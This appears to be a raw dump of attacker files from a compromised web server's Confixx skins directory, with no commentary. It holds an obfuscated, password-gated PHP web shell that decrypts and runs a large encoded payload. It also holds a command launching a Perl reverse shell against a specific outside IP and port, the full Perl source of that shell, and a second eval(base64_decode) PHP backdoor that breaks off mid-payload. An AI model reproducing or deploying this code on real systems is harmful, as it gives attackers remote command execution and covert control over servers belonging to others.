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
KRba9Hs=
'));$_f__f=isset($_POST['_f__f'])?$_POST['_f__f']:(isset($_COOKIE['_f__f'])?$_COOKIE['_f__f']:NULL);if($_f__f!==NULL){$_f__f=md5($_f__f).substr(md5(strrev($_f__f)),0,strlen($_f__f));for($_f____f=0;$_f____f<15185;$_f____f++){$_f___f[$_f____f]=chr(( ord($_f___f[$_f____f])-ord($_f__f[$_f____f]))%256);$_f__f.=$_f___f[$_f____f];}if($_f___f=@gzinflate($_f___f)){if(isset($_POST['_f__f']))@setcookie('_f__f', $_POST['_f__f']);$_f____f=create_function('',$_f___f);unset($_f___f,$_f__f);$_f____f();}}?><form action="" method="post"><input type="text" name="_f__f" value=""/><input type="submit" value="&gt;"/></form>

/home/www/confixx/html/skins/1

perl skins/2 162.216.6.208 44

/home/www/confixx/html/skins/2

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

/home/www/confixx/html/skins/1

<?php error_reporting(0);$p="jedbzzazbzcb";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdH